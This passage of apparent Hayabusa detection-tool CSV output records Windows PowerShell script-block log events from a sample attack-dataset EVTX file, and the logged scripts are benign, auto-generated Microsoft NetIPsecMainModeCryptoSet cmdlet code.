[ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 
'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) 
{ $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeCryptoSet' -Alias '*' function 
Set-NetIPsecMainModeCryptoSe",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"rameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeCryptoSet' -Alias '*' function 
Get-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = 
$true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 
'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeCryptoSet' -Alias '*' function Set-NetIPsecMainModeCryptoSe",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"t { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, 
$script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPrese",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"t { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 